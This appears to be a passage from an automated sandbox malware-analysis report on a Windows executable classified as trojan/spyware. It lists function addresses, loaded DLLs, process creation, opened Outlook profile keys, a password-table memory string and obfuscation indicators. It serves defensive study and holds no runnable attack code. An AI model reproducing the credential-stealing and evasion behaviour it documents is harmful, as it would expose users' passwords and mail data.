            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_73961B5F0_2_73961B5F
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_00404DCC5_2_00404DCC
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_00406AF25_2_00406AF2
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_001643385_2_00164338
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_00168DF85_2_00168DF8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_001659785_2_00165978
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836603D5_2_3836603D
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_383603AF5_2_383603AF
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836CCA05_2_3836CCA0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836C6385_2_3836C638
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836B07F5_2_3836B07F
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836F05A5_2_3836F05A
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_383678485_2_38367848
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836B9305_2_3836B930
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836C1F25_2_3836C1F2
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836DA895_2_3836DA89
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836E3475_2_3836E347
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836EBF75_2_3836EBF7
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836CCA25_2_3836CCA2
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836B4D85_2_3836B4D8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836BDA25_2_3836BDA2
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_383676285_2_38367628
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836DEE15_2_3836DEE1
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836E79F5_2_3836E79F
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F4A9B05_2_38F4A9B0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F4BA975_2_38F4BA97
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F4A3605_2_38F4A360
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F4BDF05_2_38F4BDF0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F49D105_2_38F49D10
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F496C85_2_38F496C8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F486505_2_38F48650
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F420F85_2_38F420F8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F470705_2_38F47070
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F470615_2_38F47061
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F418585_2_38F41858
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F400405_2_38F40040
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F448205_2_38F44820
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F451F85_2_38F451F8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F429B85_2_38F429B8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F4A9A05_2_38F4A9A0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F421085_2_38F42108
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F45AB85_2_38F45AB8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F45AA85_2_38F45AA8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F432685_2_38F43268
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F432585_2_38F43258
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F452085_2_38F45208
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F413F05_2_38F413F0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F443C85_2_38F443C8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F463685_2_38F46368
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F4A3525_2_38F4A352
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F463585_2_38F46358
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F47B4F5_2_38F47B4F
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F43B185_2_38F43B18
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F43B085_2_38F43B08
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F474C85_2_38F474C8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F41CB05_2_38F41CB0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F474B85_2_38F474B8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F41CA05_2_38F41CA0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F46C185_2_38F46C18
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F414005_2_38F41400
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F46C095_2_38F46C09
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F44DB05_2_38F44DB0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F44DB25_2_38F44DB2
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F425605_2_38F42560
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F4255F5_2_38F4255F
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F49D005_2_38F49D00
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F436C05_2_38F436C0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F436C25_2_38F436C2
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F496B85_2_38F496B8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F456605_2_38F45660
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F4565F5_2_38F4565F
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F486405_2_38F48640
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F42E105_2_38F42E10
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F42E005_2_38F42E00
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F4AFF75_2_38F4AFF7
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F4AFF85_2_38F4AFF8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F467C05_2_38F467C0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F467B05_2_38F467B0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F40FA85_2_38F40FA8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F40F985_2_38F40F98
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F43F705_2_38F43F70
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F43F725_2_38F43F72
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38F45F105_2_38F45F10
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_39476FA05_2_39476FA0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3947E7905_2_3947E790
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3947D6085_2_3947D608
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_394783285_2_39478328
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: String function: 00402C41 appears 49 times
            Source: czHx16QwGQ.exe, 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs czHx16QwGQ.exe
            Source: czHx16QwGQ.exe, 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs czHx16QwGQ.exe
            Source: czHx16QwGQ.exe, 00000005.00000002.2725015307.0000000005C13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs czHx16QwGQ.exe
            Source: czHx16QwGQ.exe, 00000005.00000002.2745276565.0000000035F97000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs czHx16QwGQ.exe
            Source: czHx16QwGQ.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs czHx16QwGQ.exe
            Source: czHx16QwGQ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,5_2_004034A5
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,LdrInitializeThunk,MulDiv,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SetDlgItemTextW,0_2_00404850
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,0_2_00402104
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeMutant created: NULL
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeFile created: C:\Users\user\AppData\Local\Temp\nsfC823.tmpJump to behavior
            Source: czHx16QwGQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000362C4000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000362B8000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036295000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000362A3000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036285000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2746715571.00000000371CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: czHx16QwGQ.exeVirustotal: Detection: 74%
            Source: czHx16QwGQ.exeReversingLabs: Detection: 63%
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeFile read: C:\Users\user\Desktop\czHx16QwGQ.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\czHx16QwGQ.exe "C:\Users\user\Desktop\czHx16QwGQ.exe"
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess created: C:\Users\user\Desktop\czHx16QwGQ.exe "C:\Users\user\Desktop\czHx16QwGQ.exe"
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess created: C:\Users\user\Desktop\czHx16QwGQ.exe "C:\Users\user\Desktop\czHx16QwGQ.exe"Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: czHx16QwGQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2176225336.00000000050E2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_73961B5F LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73961B5F
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_0016A487 push dword ptr [ebp+ecx-75h]; retf 5_2_0016A492
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_0016A4F9 push dword ptr [ebp+ebx-75h]; iretd 5_2_0016A4FD
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_38366A04 pushfd ; retf 5_2_38366A05
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836AF7F push esi; retf 5_2_3836AF80
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_383677DC push edx; retf 5_2_383677EB
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeFile created: C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
